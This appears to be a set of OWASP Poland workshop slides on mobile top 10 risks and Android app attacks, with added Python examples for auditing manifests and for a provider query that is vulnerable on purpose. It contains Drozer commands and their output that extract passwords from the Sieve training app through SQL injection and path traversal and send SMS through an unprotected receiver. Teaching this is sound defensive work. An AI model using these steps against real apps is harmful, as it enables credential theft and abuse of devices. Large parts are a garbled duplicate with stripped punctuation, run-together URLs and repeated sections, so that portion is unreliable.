• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple-words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage is about the developer's conscious efforts to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakage
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending GPS location)
Unintended data leakage ndash how to find
• Extract data from leaking content providers using Drozer:
    dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, using ADB:
    adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple-words definition: if you're able to bypass authentication and/or leverage your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
    dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user/see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
• A flaw in an application can become an entry point to compromise the operating system
• For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed – they must be enforced again on the server side whenever possible
• Persistent authentication ("Remember Me") functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple-words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it…):
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if the application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the password to decrypt it in the code…
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
• Use known, strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on the device; use password-based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple-words definition: malicious code can be provided as input and executed by the application (on the client side)
• The malicious code can come from:
  – Another application, via intent/content provider
  – A shared file
  – A server response
  – A third-party website
Client side injection – what to inject
• SQL injection into the local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, a new activity, etc.) via special objects called Intents:
    Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
    Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection ndash how to find
• SQL injections:
    dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
    dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
    dz> run app.package.manifest -a <package_name>
    dz> run app.activity.info -a <package_name>
    dz> run app.service.info --permission null -a <package_name>
    dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the „smdm://” prefix allows remote installation of ANY application while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using intent-filters. Even if the Activity has the attribute „exported=false”, another application can define the same filter, and the system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling – what it is
• Simple-words definition: if your session token can be guessed, retrieved by a third party, or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and verify if:
  – a session expires (copy a cookie and try to use it after 30 minutes)
  – a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user)
  – you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – a few facts from reality
• What we know is that „sessions have to expire”…
• …but how long should a session REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
- http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
Improper session handling - mitigations
• Invalidate the session on the server side
• Set the session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
Thank you
pawelrzepaoutlookcom
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference/
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage/
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security/
• https://mobilesecuritywiki.com/
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest/
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step/
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone:
  – APK Optic
  – Astro File Manager
• Using ADB
• Using APKpure
Decompiling || Disassembling
• Decompiling – high level – Java code
• Disassembling – low level – assembly code
• Why disassembling and not decompiling?
Decompiling
DEX → JAR → JAVA
Decompiling – Dex2Jar
• dex2jar:
  – Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – Allows using any existing Java decompiler on the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten:
  – Closed-source Java decompiler
  – Combined with dex2jar, you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → SMALI
Disassembling
• Apktool:
  – Open-source Java tool for reverse engineering Android apps
  – Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:
    java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Services attacks
Typical attacks: Denial of Service and Information Leakage
• Find exported services
• Launch them one-by-one with logcat running to check for sensitive info
• Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
Example: using content providers, any app can read SMS from the built-in SMS app's repository on our device.
Content providers
Content providers
• What info can they hold?
  – User's phone numbers
  – Passwords
  – SMS
• And one of the main problems is, again, permissions:
    run app.provider.info --permission null
Content providers
Content providers attacks
• Unrestricted access to the app database
  – Just query it:
    run app.provider.query content://settings/secure
• SQL injection
• Path traversal
Other attack vectors on auth might include altering data, e.g. by using the app.provider.insert command.
Content providers
dz> run scanner.provider.injection -a com.mwr.example.sieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dz> run scanner.provider.finduris -a com.mwr.example.sieve
Accessible content URIs:
  content://com.mwr.example.sieve.DBContentProvider/Keys/
  content://com.mwr.example.sieve.DBContentProvider/Passwords
  content://com.mwr.example.sieve.DBContentProvider/Passwords/
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
Content providers attacks
bull SQL injection
Content providers
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
| Password         | pin  |
| thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost
dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
Written 24576 bytes
Content providers – demo
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as "battery low", "boot completed", "headset plugged in", etc. Though most broadcasts originate from the system, applications can also announce broadcasts.
Broadcast receivers
Broadcast receivers
• If a receiver accepts broadcasts from untrusted sources, the app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail: authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send an intent and enjoy
Broadcast receivers
Broadcast receivers attacks
<receiver android:name="broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
    <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
    </intent-filter>
</receiver>
…
<uses-permission android:name="android.permission.SEND_SMS" />
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
// Receiver body: every extra of the incoming intent is trusted and used to send an SMS
public void onReceive(Context arg0, Intent arg1) {
    context = arg0;
    SmsManager sms = SmsManager.getDefault();
    Bundle bundle = arg1.getExtras();
    sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
    Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
}
The code above is what determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action.
Broadcast receivers
Broadcast receivers attacks
run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies to all of the above-mentioned items:
• Setting the android:exported attribute to false (only components running under the same user ID as the current app will be able to access the activity)
• Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
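As an added example that is not part of the slides or of GoatDroid, the auditor below applies the two defenses above to a manifest: a component with no android:exported attribute but with an intent-filter is treated as exported (and a provider with no attribute as exported, the pre-API-17 default), and an exported component that declares no android:permission is reported. The manifest is constructed: the SendSMSNowReceiver entry follows the GoatDroid snippet above, while GuardedReceiver, LocationService, FileBackupProvider and the custom permission name are made up for the example.

```python
"""Audit an AndroidManifest.xml for components reachable by other apps.

Added example for this workshop page (not from the slides or GoatDroid).
Export rules applied, as assumed here:
  * android:exported="true"  -> exported
  * android:exported="false" -> not exported
  * attribute absent: exported if the component declares an <intent-filter>;
    a <provider> with the attribute absent is treated as exported (API < 17)
A component counts as protected only if it declares android:permission.
"""
import xml.etree.ElementTree as ET
from typing import List, NamedTuple

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")
LAUNCHER = "android.intent.category.LAUNCHER"

# Constructed manifest; only the SendSMSNowReceiver entry mirrors GoatDroid.
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="org.owasp.goatdroid.fourgoats">
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <application>
    <activity android:name=".activities.Main">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <receiver android:name="broadcastreceivers.SendSMSNowReceiver"
              android:label="Send SMS">
      <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS"/>
      </intent-filter>
    </receiver>
    <receiver android:name="broadcastreceivers.GuardedReceiver"
              android:exported="true"
              android:permission="org.owasp.goatdroid.fourgoats.permission.SEND">
      <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.GUARDED"/>
      </intent-filter>
    </receiver>
    <service android:name=".services.LocationService"/>
    <provider android:name=".providers.FileBackupProvider"
              android:authorities="org.owasp.goatdroid.fourgoats.backup"
              android:exported="false"/>
  </application>
</manifest>
"""


class Finding(NamedTuple):
    kind: str
    name: str
    reason: str


def is_exported(elem: ET.Element) -> bool:
    """Apply the export rules from the module docstring to one component."""
    exported = elem.get(ANDROID_NS + "exported")
    if exported is not None:
        return exported.lower() == "true"
    if elem.tag == "provider":
        return True                         # pre-API-17 default for providers
    return elem.find("intent-filter") is not None


def is_launcher(activity: ET.Element) -> bool:
    """The launcher activity is exported by design and is not a finding."""
    return any(c.get(ANDROID_NS + "name") == LAUNCHER for c in activity.iter("category"))


def audit_manifest(xml_text: str) -> List[Finding]:
    """Return exported components that no android:permission protects."""
    app = ET.fromstring(xml_text).find("application")
    findings: List[Finding] = []
    for elem in app:
        if elem.tag not in COMPONENT_TAGS or not is_exported(elem):
            continue
        if elem.get(ANDROID_NS + "permission"):
            continue                        # exported, but gated by a permission
        if elem.tag == "activity" and is_launcher(elem):
            continue
        if elem.get(ANDROID_NS + "exported"):
            reason = 'android:exported="true" with no android:permission'
        else:
            reason = "implicitly exported by <intent-filter>, no android:permission"
        findings.append(Finding(elem.tag, elem.get(ANDROID_NS + "name", "?"), reason))
    return findings


if __name__ == "__main__":
    for f in audit_manifest(SAMPLE_MANIFEST):
        print(f"{f.kind}: {f.name}: {f.reason}")
```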
References
• http://developer.android.com/guide/components/index.html
• http://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components/
• http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage/
• http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers/
• httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdf
• https://www.safaribooksonline.com/library/view/android-security-cookbook/
• https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
• https://manifestsecurity.com/android-application-security-part-5/
• https://manifestsecurity.com/android-application-security-part-8/
• https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
• http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
• https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#android-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Content providers
A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
Example: using content providers, any app granted the READ_SMS permission can read SMS from the built-in SMS app's repository on the device.
Content providers
• What info can they hold?
  – User's phone numbers
  – Passwords
  – SMS
• And one of the main problems is, again, permissions: a provider that is exported without any permission can be queried by every app on the device. Drozer lists exactly those:
  run app.provider.info --permission null
Content providers attacks
• Unrestricted access to the app database – just query it:
  run app.provider.query content://settings/secure
• SQL injection
• Path traversal
Other attack vectors might include altering data, e.g. with the app.provider.insert command (app.provider.update and app.provider.delete exist as well).
Content providers
dz> run scanner.provider.injection -a com.mwr.example.sieve
Content providers attacks
• Unrestricted access to the app database
dz> run scanner.provider.finduris -a com.mwr.example.sieve
Accessible content URIs:
  content://com.mwr.example.sieve.DBContentProvider/Keys
  content://com.mwr.example.sieve.DBContentProvider/Passwords
  content://com.mwr.example.sieve.DBContentProvider/Passwords/
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
Content providers attacks
• SQL injection
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key--"
| Password         | pin  |
| thisismypassword | 9876 |
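How the two injections above work on the provider side, as an added example (this is not the workshop's code nor Sieve's own source): a Python/sqlite3 stand-in for a ContentProvider.query() that pastes the caller's projection and selection straight into the SQL, next to a version that allow-lists columns and binds the selection value. The table contents, column names and allow-lists are constructed for the example.

```python
import sqlite3

# Constructed stand-in for Sieve's Passwords and Key tables (made-up rows).
_SCHEMA = """
CREATE TABLE Passwords (_id INTEGER PRIMARY KEY, service TEXT, username TEXT, password TEXT);
CREATE TABLE Key (Password TEXT, pin TEXT);
INSERT INTO Passwords VALUES (1, 'mail', 'alice', 'hunter2');
INSERT INTO Key VALUES ('thisismypassword', '9876');
"""

# Columns the provider is willing to expose; a real app would keep the key
# table out of the provider entirely.
ALLOWED_COLUMNS = ("_id", "service", "username", "password")
# The only WHERE clauses this provider needs; anything else is rejected.
ALLOWED_SELECTIONS = ("", "service = ?")


def _open_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(_SCHEMA)
    return conn


def vulnerable_query(projection: str, selection: str) -> list:
    """Equivalent of a query() that runs
    "SELECT " + projection + " FROM Passwords WHERE (" + selection + ")"
    with both strings taken verbatim from the calling app."""
    sql = f"SELECT {projection} FROM Passwords WHERE ({selection})"
    return _open_db().execute(sql).fetchall()


def probe(projection: str, selection: str):
    """Drive vulnerable_query the way drozer's app.provider.query does and
    return either the rows or the SQL error text (which leaks the statement
    shape, as on the slide)."""
    try:
        return "rows", vulnerable_query(projection, selection)
    except sqlite3.OperationalError as exc:
        return "error", str(exc)


def hardened_query(projection: list, selection: str, selection_args: list) -> list:
    """Same interface, but the projection is checked against an allow-list (the
    job of SQLiteQueryBuilder.setProjectionMap/setStrict on Android) and the
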